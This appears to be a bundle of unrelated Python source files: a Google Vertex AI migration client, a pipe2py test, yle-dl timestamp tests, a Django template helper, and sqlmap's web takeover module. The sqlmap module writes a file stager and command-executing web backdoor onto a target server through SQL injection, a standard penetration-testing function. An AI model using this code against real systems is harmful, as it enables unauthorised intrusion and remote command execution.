project=project, dataset=dataset, annotated_dataset=annotated_dataset,
)
@staticmethod
def parse_annotated_dataset_path(path: str) -> Dict[str, str]:
"""Parses a annotated_dataset path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/datasets/(?P<dataset>.+?)/annotatedDatasets/(?P<annotated_dataset>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def dataset_path(project: str, location: str, dataset: str,) -> str:
"""Returns a fully-qualified dataset string."""
return "projects/{project}/locations/{location}/datasets/{dataset}".format(
project=project, location=location, dataset=dataset,
)
@staticmethod
def parse_dataset_path(path: str) -> Dict[str, str]:
"""Parses a dataset path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/datasets/(?P<dataset>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def dataset_path(project: str, dataset: str,) -> str:
"""Returns a fully-qualified dataset string."""
return "projects/{project}/datasets/{dataset}".format(
project=project, dataset=dataset,
)
@staticmethod
def parse_dataset_path(path: str) -> Dict[str, str]:
"""Parses a dataset path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/datasets/(?P<dataset>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def dataset_path(project: str, location: str, dataset: str,) -> str:
"""Returns a fully-qualified dataset string."""
return "projects/{project}/locations/{location}/datasets/{dataset}".format(
project=project, location=location, dataset=dataset,
)
@staticmethod
def parse_dataset_path(path: str) -> Dict[str, str]:
"""Parses a dataset path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/datasets/(?P<dataset>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def model_path(project: str, location: str, model: str,) -> str:
"""Returns a fully-qualified model string."""
return "projects/{project}/locations/{location}/models/{model}".format(
project=project, location=location, model=model,
)
@staticmethod
def parse_model_path(path: str) -> Dict[str, str]:
"""Parses a model path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/models/(?P<model>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def model_path(project: str, location: str, model: str,) -> str:
"""Returns a fully-qualified model string."""
return "projects/{project}/locations/{location}/models/{model}".format(
project=project, location=location, model=model,
)
@staticmethod
def parse_model_path(path: str) -> Dict[str, str]:
"""Parses a model path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/models/(?P<model>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def version_path(project: str, model: str, version: str,) -> str:
"""Returns a fully-qualified version string."""
return "projects/{project}/models/{model}/versions/{version}".format(
project=project, model=model, version=version,
)
@staticmethod
def parse_version_path(path: str) -> Dict[str, str]:
"""Parses a version path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/models/(?P<model>.+?)/versions/(?P<version>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, MigrationServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the migration service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, MigrationServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, MigrationServiceTransport):
# transport is a MigrationServiceTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=(
Transport == type(self).get_transport_class("grpc")
or Transport == type(self).get_transport_class("grpc_asyncio")
),
)
def search_migratable_resources(
self,
request: migration_service.SearchMigratableResourcesRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.SearchMigratableResourcesPager:
r"""Searches all of the resources in
automl.googleapis.com, datalabeling.googleapis.com and
ml.googleapis.com that can be migrated to Vertex AI's
given location.
Args:
request (google.cloud.aiplatform_v1beta1.types.SearchMigratableResourcesRequest):
The request object. Request message for
[MigrationService.SearchMigratableResources][google.cloud.aiplatform.v1beta1.MigrationService.SearchMigratableResources].
parent (str):
Required. The location that the migratable resources
should be searched from. It's the Vertex AI location
that the resources can be migrated to, not the
resources' original location. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.migration_service.pagers.SearchMigratableResourcesPager:
Response message for
[MigrationService.SearchMigratableResources][google.cloud.aiplatform.v1beta1.MigrationService.SearchMigratableResources].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a migration_service.SearchMigratableResourcesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, migration_service.SearchMigratableResourcesRequest):
request = migration_service.SearchMigratableResourcesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.search_migratable_resources
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.SearchMigratableResourcesPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def batch_migrate_resources(
self,
request: migration_service.BatchMigrateResourcesRequest = None,
*,
parent: str = None,
migrate_resource_requests: Sequence[
migration_service.MigrateResourceRequest
] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Batch migrates resources from ml.googleapis.com,
automl.googleapis.com, and datalabeling.googleapis.com
to Vertex AI.
Args:
request (google.cloud.aiplatform_v1beta1.types.BatchMigrateResourcesRequest):
The request object. Request message for
[MigrationService.BatchMigrateResources][google.cloud.aiplatform.v1beta1.MigrationService.BatchMigrateResources].
parent (str):
Required. The location of the migrated resource will
live in. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
migrate_resource_requests (Sequence[google.cloud.aiplatform_v1beta1.types.MigrateResourceRequest]):
Required. The request messages
specifying the resources to migrate.
They must be in the same location as the
destination. Up to 50 resources can be
migrated in one batch.
This corresponds to the ``migrate_resource_requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.aiplatform_v1beta1.types.BatchMigrateResourcesResponse`
Response message for
[MigrationService.BatchMigrateResources][google.cloud.aiplatform.v1beta1.MigrationService.BatchMigrateResources].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, migrate_resource_requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a migration_service.BatchMigrateResourcesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, migration_service.BatchMigrateResourcesRequest):
request = migration_service.BatchMigrateResourcesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if migrate_resource_requests is not None:
request.migrate_resource_requests = migrate_resource_requests
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.batch_migrate_resources]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
migration_service.BatchMigrateResourcesResponse,
metadata_type=migration_service.BatchMigrateResourcesOperationMetadata,
)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("MigrationServiceClient",)
|
sasha-gitg/python-aiplatform
|
google/cloud/aiplatform_v1beta1/services/migration_service/client.py
|
Python
|
apache-2.0
| 28,138
|
# Pipe pipe_zKJifuNS3BGLRQK_GsevXg generated by pipe2py
from pipe2py import Context
from pipe2py.modules.pipeforever import pipe_forever
from pipe2py.modules.pipefetch import pipe_fetch
from pipe2py.modules.pipesplit import pipe_split
from pipe2py.modules.pipecount import pipe_count
from pipe2py.modules.pipesimplemath import pipe_simplemath
from pipe2py.modules.pipesimplemath import pipe_simplemath
from pipe2py.modules.pipetruncate import pipe_truncate
from pipe2py.modules.pipeoutput import pipe_output
def pipe_zKJifuNS3BGLRQK_GsevXg(context=None, _INPUT=None, conf=None, **kwargs):
# todo: insert pipeline description here
conf = conf or {}
if context and context.describe_input:
return []
if context and context.describe_dependencies:
return [u'pipecount', u'pipefetch', u'pipeoutput', u'pipesimplemath', u'pipesplit', u'pipetruncate']
forever = pipe_forever()
sw_224 = pipe_fetch(
context, forever, conf={'URL': {'type': 'url', 'value': 'file://data/www.sciencedaily.com_rss_computers_math.html'}})
sw_250 = pipe_split(
context, sw_224, splits=2, conf=None)
sw_243 = pipe_count(
context, sw_250, conf=None)
sw_94 = pipe_simplemath(
context, sw_243, conf={'OTHER': {'type': 'number', 'value': '5'}, 'OP': {'type': 'text', 'value': 'modulo'}})
sw_169 = pipe_simplemath(
context, sw_243, OTHER=sw_94, conf={'OTHER': {'terminal': 'OTHER', 'type': 'number'}, 'OP': {'type': 'text', 'value': 'subtract'}})
sw_232 = pipe_truncate(
context, sw_250, count=sw_169, conf={'count': {'terminal': 'count', 'type': 'number'}})
_OUTPUT = pipe_output(
context, sw_232, conf=None)
return _OUTPUT
if __name__ == "__main__":
pipeline = pipe_zKJifuNS3BGLRQK_GsevXg(Context())
for i in pipeline:
print i
|
ganugapav/pipe
|
tests/pypipelines/pipe_zKJifuNS3BGLRQK_GsevXg.py
|
Python
|
gpl-2.0
| 1,875
|
#!/usr/bin/env python
#coding=utf-8
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import posixpath
import re
import StringIO
import tempfile
import urlparse
from extra.cloak.cloak import decloak
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getAutoDirectories
from lib.core.common import getManualDirectories
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSQLSnippet
from lib.core.common import getUnicode
from lib.core.common import ntToPosixSlashes
from lib.core.common import isTechniqueAvailable
from lib.core.common import isWindowsDriveLetterPath
from lib.core.common import normalizePath
from lib.core.common import parseFilePaths
from lib.core.common import posixToNtSlashes
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import singleTimeWarnMessage
from lib.core.convert import hexencode
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import HTTP_HEADER
from lib.core.enums import OS
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.enums import WEB_API
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
from lib.core.settings import EVENTVALIDATION_REGEX
from lib.core.settings import VIEWSTATE_REGEX
from lib.request.connect import Connect as Request
from thirdparty.oset.pyoset import oset
class Web:
"""
    This class defines web-related OS takeover functionality for the plugins.
"""
def __init__(self):
self.webApi = None
self.webBaseUrl = None
self.webBackdoorUrl = None
self.webBackdoorFilePath = None
self.webStagerUrl = None
self.webStagerFilePath = None
self.webDirectory = None
def webBackdoorRunCmd(self, cmd):
if self.webBackdoorUrl is None:
return
output = None
if not cmd:
cmd = conf.osCmd
cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)
if page is not None:
output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
if output:
output = output.group(1)
return output
def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
if filepath is not None:
if filepath.endswith('_'):
                content = decloak(filepath) # cloaked file
else:
with open(filepath, "rb") as f:
content = f.read()
if content is not None:
            stream = StringIO.StringIO(content) # string content
return self._webFileStreamUpload(stream, destFileName, directory)
def _webFileStreamUpload(self, stream, destFileName, directory):
stream.seek(0) # Rewind
try:
setattr(stream, "name", destFileName)
except TypeError:
pass
if self.webApi in getPublicTypeMembers(WEB_API, True):
multipartParams = {
"upload": "1",
"file": stream,
"uploadDir": directory,
}
if self.webApi == WEB_API.ASPX:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = u"无法通过web file stager上传文件到'%s'" % directory
logger.warn(warnMsg)
return False
else:
return True
else:
logger.error(u"sqlmap没有一个web后门,也没有一个web文件stager的%s" % self.webApi)
return False
def _webFileInject(self, fileContent, fileName, directory):
outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
query = ""
if isTechniqueAvailable(kb.technique):
where = kb.injection.data[kb.technique].where
if where == PAYLOAD.WHERE.NEGATIVE:
randInt = randomInt()
query += "OR %d=%d " % (randInt, randInt)
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
query = agent.prefixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload)
return page
def webInit(self):
"""
        This method is used to write a web backdoor (agent) in a writable remote directory within the web server document root.
"""
if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
return
self.checkDbmsOs()
default = None
choices = list(getPublicTypeMembers(WEB_API, True))
for ext in choices:
if conf.url.endswith(ext):
default = ext
break
if not default:
default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP
message = u"Web服务器支持哪种Web应用程序语言?\n"
for count in xrange(len(choices)):
ext = choices[count]
message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else ""))
if default == ext:
default = count + 1
message = message[:-1]
while True:
choice = readInput(message, default=str(default))
if not choice.isdigit():
logger.warn("无效值,只允许使用数字")
elif int(choice) < 1 or int(choice) > len(choices):
logger.warn("无效值,它必须介于1和%d之间" % len(choices))
else:
self.webApi = choices[int(choice) - 1]
break
if not kb.absFilePaths:
message = "你是否希望sqlmap进一步尝试引发完整的路径泄露? [Y/n] "
if readInput(message, default='Y', boolean=True):
headers = {}
been = set([conf.url])
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I):
url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
if url not in been:
try:
page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
parseFilePaths(page)
except:
pass
finally:
been.add(url)
url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url)
if url not in been:
try:
page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
parseFilePaths(page)
except:
pass
finally:
been.add(url)
for place in (PLACE.GET, PLACE.POST):
if place in conf.parameters:
value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
if "[]" in value:
page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)
cookie = None
if PLACE.COOKIE in conf.parameters:
cookie = conf.parameters[PLACE.COOKIE]
elif headers and HTTP_HEADER.SET_COOKIE in headers:
cookie = headers[HTTP_HEADER.SET_COOKIE]
if cookie:
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
if value != cookie:
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
if value != cookie:
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)
directories = list(arrayizeValue(getManualDirectories()))
directories.extend(getAutoDirectories())
directories = list(oset(directories))
path = urlparse.urlparse(conf.url).path or '/'
if path != '/':
_ = []
for directory in directories:
_.append(directory)
if not directory.endswith(path):
_.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
directories = _
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
for directory in directories:
if not directory:
continue
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
uploaded = False
directory = ntToPosixSlashes(normalizePath(directory))
if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
directory = "/%s" % directory
if not directory.endswith('/'):
directory += '/'
            # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
            # (the LINES TERMINATED BY clause specifies the end-of-line marker, e.g. "LINES TERMINATED BY '?'")
            infoMsg = u"trying to upload the file stager on '%s' via LIMIT 'LINES TERMINATED BY' method" % directory
logger.info(infoMsg)
self._webFileInject(stagerContent, stagerName, directory)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = u"尝试查看该文件是否可以从'%s'访问" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
            # Fall back to the UNION query file upload method
            if not uploaded:
                warnMsg = u"unable to upload the file stager on '%s'" % directory
singleTimeWarnMessage(warnMsg)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
infoMsg = u"尝试通过UNION方法将文件上传到'%s'上" % directory
logger.info(infoMsg)
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
handle, filename = tempfile.mkstemp()
os.close(handle)
with open(filename, "w+b") as f:
_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
_ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
f.write(_)
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = u"正在尝试查看文件是否可以从'%s'访问" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
if not uploaded:
continue
if "<%" in uplPage or "<?" in uplPage:
warnMsg = u"文件stager上传在'%s', " % directory
warnMsg += u"但不动态解释"
logger.warn(warnMsg)
continue
elif self.webApi == WEB_API.ASPX:
kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
infoMsg = u"文件stager已成功上传到'%s' - %s" % (directory, self.webStagerUrl)
logger.info(infoMsg)
if self.webApi == WEB_API.ASP:
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
if match:
backdoorDirectory = match.group(1)
else:
continue
_ = "tmpe%s.exe" % randomStr(lowercase=True)
if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_"))
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = backdoorDirectory
else:
continue
else:
if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
warnMsg = u"后门没有通过file stager成功上传,"
warnMsg += u"这可能是因为运行Web服务器进程的用户没有权限"
warnMsg += u"在运行DBMS进程的用户文件夹中上传文件,因为没有写入权限,"
warnMsg += u"或者因为DBMS和Web服务位于不同的服务器上"
logger.warn(warnMsg)
message = u"你想尝试使用与文件stager相同的方法? [Y/n] "
if readInput(message, default='Y', boolean=True):
self._webFileInject(backdoorContent, backdoorName, directory)
else:
continue
self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
self.webDirectory = directory
self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
testStr = u"命令执行测试"
output = self.webBackdoorRunCmd("echo %s" % testStr)
if output == "0":
warnMsg = u"后门已经上传,但缺少运行系统命令的必需权限"
raise SqlmapNoneDataException(warnMsg)
elif output and testStr in output:
infoMsg = u"后门已经成功 "
else:
infoMsg = u"后门可能已经成功 "
infoMsg += u"上传到'%s' - " % self.webDirectory
infoMsg += self.webBackdoorUrl
logger.info(infoMsg)
break
|
hackersql/sq1map
|
lib/takeover/web.py
|
Python
|
gpl-3.0
| 16,870
|
from datetime import datetime, timedelta
from yledl.timestamp import parse_areena_timestamp
def test_timestamp():
ts = parse_areena_timestamp('2018-01-02T18:30:00+02:00')
assert ts.replace(tzinfo=None) == datetime(2018, 1, 2, 18, 30, 00)
assert ts.utcoffset() == timedelta(hours=2)
def test_timestamp_strip():
ts = parse_areena_timestamp(' 2018-01-02T18:30:00+02:00 ')
assert ts.replace(tzinfo=None) == datetime(2018, 1, 2, 18, 30, 00)
def test_invalid_timestamp():
assert parse_areena_timestamp('xxx2018-01-02T18:30:00+02:00') is None
assert parse_areena_timestamp('2018-01-02T18:30:00') is None
assert parse_areena_timestamp('2018-01-999999T18:30:00+02:00') is None
assert parse_areena_timestamp('2018-01-999999T22222') is None
|
aajanki/yle-dl
|
tests/test_timestamp.py
|
Python
|
gpl-3.0
| 778
|
import logging
import os
from django.conf import settings
from django.template import loader
__all__ = ('gen_all_templates',)
def gen_all_templates():
"""
Generator. Finds paths for all the templates accessible through the loaders in TEMPLATE_LOADERS.
Yields tuples: (rel_path, abs_path)
"""
from django.template.loaders.cached import Loader as CachedLoader
if not loader.template_source_loaders:
# force the template loaders to populate
try:
loader.find_template('foo')
except loader.TemplateDoesNotExist:
pass
loaders = []
for l in loader.template_source_loaders:
if isinstance(l, CachedLoader):
# flatten cached loaders, otherwise they're kinda complex
loaders.extend(l.loaders)
else:
loaders.append(l)
for l in loaders:
for tupl in gen_loader_templates(l):
yield tupl
def gen_loader_templates(l):
"""
Generator. Yields paths to the templates for the given loader.
"""
logging.info('Using loader: %r' % l)
from django.template.loaders.app_directories import Loader as ADLoader
from django.template.loaders.filesystem import Loader as FSLoader
#from django.template.loaders.eggs import Loader as EggsLoader
if isinstance(l, ADLoader):
gen = _gen_AD_templates
elif isinstance(l, FSLoader):
gen = _gen_FS_templates
else:
#TODO EggsLoader (any others?)
# TODO: should probably just raise a warning here, since any other loaders in settings will work fine.
raise ValueError("django-tc doesn't support this loader: %s" % l.__class__.__name__)
for tupl in gen(l):
yield tupl
def _gen_AD_templates(l):
"""
Generator. Takes an app_directories loader, and yields paths to the templates for it.
"""
from django.template.loaders.app_directories import app_template_dirs
for tupl in _gen_FS_templates(l, app_template_dirs):
yield tupl
